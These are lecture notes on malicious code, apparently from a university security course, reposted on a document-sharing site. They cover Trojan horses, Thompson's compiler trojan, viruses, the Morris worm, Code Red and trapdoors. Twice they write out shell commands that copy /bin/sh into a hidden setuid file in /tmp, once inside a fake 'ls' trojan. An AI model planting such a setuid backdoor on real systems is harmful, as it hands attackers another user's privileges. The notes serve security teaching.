|
Role Based Access Control (rbac)
|
tarix | 08.08.2018 | ölçüsü | 68,5 Kb. | | #61486 |
| Malicious Code
Kinds of Malicious Code
-
Trojan horse
-
Virus
-
Logic bomb, time bomb
-
trapdoor, backdoor
-
Worm
(2) Trojan Horse
Trojan Horses: a piece of malicious code that, in addition to its primary effect, has a second, non-obvious malicious effect.
-
ls Trojan horse.
-
If somebody visits your directory, is it possible to trick the user into running a Trojan horse program?
-
If “.” is at the beginning of the victim’s PATH environment variable.
% cp /bin/sh /tmp/.xxsh
% chmod 4777 /tmp/.xxsh
% rm ./ls
% ls $*
-
Ken Thompson's Famous Trojan Horses
-
"Reflection on Trusting Trust", Turning Award Speech.
-
Goal: add a Trojan horse to login program, so that one can use a special password to log into the system. However, the Trojan horse should be difficult to detect and fix.
-
Approach 1: Change login binary
-
This is easy to fix, just recompile it from login.c.
-
How about also change login.c? This is easy to detect if somebody reads the code. Q: how to make it more difficult to detect?
-
Approach 2: Change compiler.c for login.c, and change login.c back to the normal. When the compiler compiles login.c, it automatically adds the Trojan horses to login binary.
-
What if somebody reads compiler.c? The Trojan horse in compiler.c can be detected. They can get another copy of compiler.c, and compile this new (and clean) compiler.c.
-
Approach 3: Change the complier.c, such that a Trojan horse will be added to the binary if compiler.c and login.c are compiled. After we get the binary of compiler, we change compiler.c back to the normal.
-
The Trojan horse is already built into the binary of compiler.
-
Unless somebody looks at the compiler binary, the Trojan horse is difficult to detect. None of the source files contain any Trojan horse; Trojan horses are added by the compiler.
-
To remove the Trojan horse, one has to change the compiler program.
-
Virus
-
Must be activated by being executed. There are various ways to get activated
-
Running an affected program
-
Attachment (Melissa and Love bug)(Macro virus)
-
Reading email (Bubbleboy virus)
-
Appended Viruses
-
Viruses that surround a program
-
Boot Sector Viruses
-
Solutions
-
No general cure for viruses
-
Virus checkers are effective against known viruses only
-
Truths and Misconceptions about viruses
-
Viruses can infect systems other than PCs/MS-DOS/Windows
-
Q: why not many viruses exist in Unix?
-
Viruses can appear in data files: Microsoft Word Macro virus
-
Worms
-
History of the Internet Worm
-
Nov. 2 1988, Robert T. Morris Jr.
-
His father Robert T. Morris Sr. (in NSA) and Ken Thompson wrote a paper about network security in 1979.
-
Flaw in worm: fail to check the existence of another copy of the worm.
-
What made worm a successful attack:
-
Difference from virus: propagate via networks
-
Bug in fingerd: buffer overflow
-
Backdoor in sendmail: DEBUG mode
-
Took advantage of a mechanism used to simplify resource sharing
-
Weak passwords: password guessing
-
Worm carries a short list of common passwords (432 passwords): e.g. "guest", "passwords", "aaa", "help", "coffee", "coke", etc.
-
Use the system dictionary if the short list fails
-
Disguise:
-
More Malicious Code: Code Red
-
Middle of 2001
-
Using Microsoft's Internet Information Server (IIS)
-
Using buffer overflows
-
Trapdoors
-
Another example: What is a fast way to gain somebody's full privilege forever when he/she leaves the computer for a short period of time?
-
% cp /bin/sh /tmp/.xxsh
-
% chmod 4777 /tmp/.xxsh
-
Causes of trapdoors:
-
Forget to remove
-
Intentionally leave them in the program for testing
-
Intentionally leave them for maintenance
-
Intentionally leave them as a covert means of access to the component
Wenliang Du Malicious Code: Page of 8/8/2018
Dostları ilə paylaş: |
|
|